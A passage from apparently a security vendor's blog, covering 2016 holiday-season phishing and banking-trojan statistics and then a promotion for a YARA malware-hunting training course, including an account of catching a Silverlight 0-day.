As seen on the graph above, the spikes of detections of Amazon-themed phishing scams matched the dates of Black Friday and Cyber Monday 2016 almost perfectly. The same dynamics are repeated with some other topical brands including payment systems.

Interestingly, the dynamics during the Christmas period are different. As seen below, the number of attacks started decreasing several days prior to Christmas Eve, and then went up on 25th of December.

Such synchronous behavior could be explained by multiple factors, one of which is that cybercriminals are also celebrating Christmas and that the overall number of web users also decreases on 24th December. But on 25th December, the number of attacks goes back up.

Scams: from Black Friday to Christmas-themed

In our initial report, we examined some examples of so-called topical phishing scams dedicated to a specific topic – the Black Friday sales. While the report was published several weeks before the actual sales started, we already identified some examples of Black Friday-themed phishing scams. Closer to the start of the sales some new examples appeared.

Example of a Black Friday-themed phishing scam offering a smartphone with 65% discount.

Example of a Black Friday-themed phishing scam offering a TV for an attractive price.

The scams mostly promoted personal electronics, like smartphones and TVs, at extremely low prices, and tried to lure users into providing payment information to criminals. With Christmas approaching, the topics of scams changed accordingly. In December, our researchers started to detect Christmas and New Year-themed phishing schemes.

Example of a Christmas-themed phishing scam resembling the Alibaba.com e-shop.

The example on the screen shot above doesn’t look Christmas-themed at first glance. However this fake Alibaba.com website was available on the christmascartoons.org URL and was supposed to attract victims with a tempting offer to get a loan with very low interest, along with the ability to search for goods and buy them from the same page using a credit card.

In another example targeting mobile users, criminals tried to exploit the popularity of the Clash of Clans mobile game.

The scam promises that the developers of the game are giving away some valuable in-game virtual items for free, as a New Year present to fans.

Users can choose from range of items, however in order to receive these gifts, they need to fill in a registration form which requests their Gmail account details.

Needless to say, in exchange for this information, the victim receives nothing but a loss of control over their email account and the confirmation email.

But the latter is only sent so criminals could be sure that the credentials provided by the victim are legitimate.

In general, we can’t say that the holiday period in 2016 has seen an unusually high increase of phishing attacks, however, our major hypothesis, stated in previous reports – that criminals would exploit Black Friday and Christmas topics and dates – has been confirmed.

And of course, financial phishing wasn’t the only type of cyberthreat that behaved unusually in the last three months of 2016. The financial malware landscape also showed some interesting changes.

Financial malware attacks

In total, during Q4 2016 Kaspersky Lab registered attacks with financial malware against 319,692 users worldwide. That is 22.49% more than during the same period in 2015, when 261,000 users were attacked, and 2.7% more than in 2014. It is hard to say if such an increase has been provoked by criminal interest in the holiday season; however, data on the dynamics of attacks shows that just like phishing scammers, financial malware operators tried to connect their activity to particular dates.

Dynamics of attacks with financial malware during Q4 2016 (holiday period)

25th November 2016 (Black Friday) saw a modest, but visible spike in attacks, with another on 28th November (Cyber Monday). In all, November became the second hottest month of the period in terms of number of attacked users: with more than 120 000. The hottest was October, with more than 130 000 attacked users.

Dynamics of attacks with financial malware during Black Friday and Cyber Monday 2016

The activity of attackers during the Christmas period showed a different pattern. A major increase happened before (on December 22nd) and after (from 25 – 27th December). This may be explained by the fact that most e-commerce activities happen around these dates: people buy gifts and goods for Christmas and the New Year, travel for vacations and spend money on entertainment.

Dynamics of attacks with financial malware during the Christmas 2016 period

It is also important to note that the dynamics of attacks during the holidays are very similar to what we have already seen in 2015 and 2014. Criminals are eager to get users’ money and the holiday period is a key time for them.

To reach their goals they use one of 30 families of banking trojans of which five are the most widespread: Zbot, Nymaim, Shiotob, Gozi and Neurevt. These five are responsible for attacks against 92.35% of users in the period.

The share of users attacked with Top 5 banking trojans

Conclusion

It looks like the trends we spotted as part of our analysis of the threat landscape during the holiday period in 2014 and 2015 have repeated in 2016, but on a larger scale, with more users being attacked. It is too early to draw conclusions on how successful fraud campaigns during the 2016 holiday season were, because usually criminals who were able to steal credentials to payment cards don’t cash them in immediately. They wait for several months in order to make fraudulent transactions less suspicious to the anti-fraud systems of financial organizations, but it would be safe to say that there were multiple attempts to exploit the high sales season.

Although the holiday season is over, it is still imperative to keep in mind several simple rules to stay safe when carrying out financial operations online. Steps to follow can be found in our initial report about holiday threats.

How to hunt for rare malware

Mon, 01/09/2017 - 09:39

At SAS 2017, on April 1st and 2nd on St. Maarten, Global Director of GReAT Costin Raiu and Principal Security Researchers Vitaly Kamluk and Sergey Mineev will provide YARA training for incident response specialists and malware researchers, who need an effective arsenal for finding malware. During the training, the experts will give participants access to some of Kaspersky Lab internal systems, which are otherwise closed to the public, to demonstrate how the company’s malware analysts catch rare samples. After two days, even being a newcomer, you’ll walk away with the ability to write rules and start using the tool for hunting malware. You can book your seat now — the class will be limited for maximum 15 participants.

Each trainer has an impressive portfolio of cyber-espionage campaigns that they have investigated, including Stuxnet, Duqu, Flame, Gauss, Red October, MiniDuke, Turla, Careto/TheMask, Carbanak and Duqu2.

Why YARA training?

Protective measures that were effective yesterday don’t guarantee the same level of security tomorrow. Indicators of Compromise (IoCs) can help you search for footprints of known malware or for an active infection. But serious threat actors have started to tailor their tools to fit each victim, thus making IoCs much less effective. But good YARA detection rules still allow analysts to find malware, exploits and 0-days which couldn’t be found in any other way. The rules can be deployed in networks and on various multi scanner systems.

Giveaways

People who go through the training will be able to start writing relatively complex YARA rules for malware – from polymorphic keyloggers all the way up to highly complex malware – that can’t be detected easily with strings. The GReAT trainers will teach how to balance rules, in other words how to write detection rules while minimising the risk of false-positives. They also will share their experience of what exactly they are looking for when they write YARA rules as part of their everyday jobs.

What are the requirements for participation?

You don’t have to be an expert in order to go through this training. It’s enough to have basic knowledge of how to use a TextEditor and the UNIX grep tool, and a basic understanding of what computer viruses are and what binary formats look like. You’ll also need your laptop and YARA software v. 3.4.0 installed on the machine. Experience with malware analysis, reverse engineering and programming (especially in structured languages) will help you to learn more quickly, but this doesn’t mean that you can’t learn without it.

Catching a 0-day with YARA

One of the most remarkable cases in which Kaspersky Lab’s GReAT used YARA was the very famous Silverlight 0-day: the team started hunting for this after Hacking Team, the Italian company selling “legal surveillance tools” for governments and LEAs, was hacked. One of the stories in the media attracted our researchers’ attention — according to the article, a programmer offered to sell Hacking Team a Silverlight 0-day, an exploit for an obsolete Microsoft plug-in which at some point had been installed on a huge number of computers.

GReAT decided to create a YARA rule based on this programmer’s older, publicly available proof-of-concept exploits. Our researchers found that he had a very particular style when coding the exploits — he used very specific comments, shell code and function names. All of this unique information was used to write a YARA rule — the experts set it to carry out a clear task, basically saying “Go and hunt for any piece of malware that shows the characteristics described in the rule”. Eventually it caught a new sample, it was a 0-day, and the team reported it to Microsoft immediately.

If you’re a scholar…

Surprisingly enough, YARA can be used for any sort of classification, such as finding documents by metadata, email and so on. If you work with any kind of rare information and lack a competitive tool for searching for it, come to St. Maarten in April and join the training — you’ll benefit greatly.

You are welcome to listen the podcast to learn about how YARA can be used in malware hunting, data analysis and incident response activities.

Book a seat at sas.kaspersky.com now to hunt APTs with YARA like a GReAT ninja!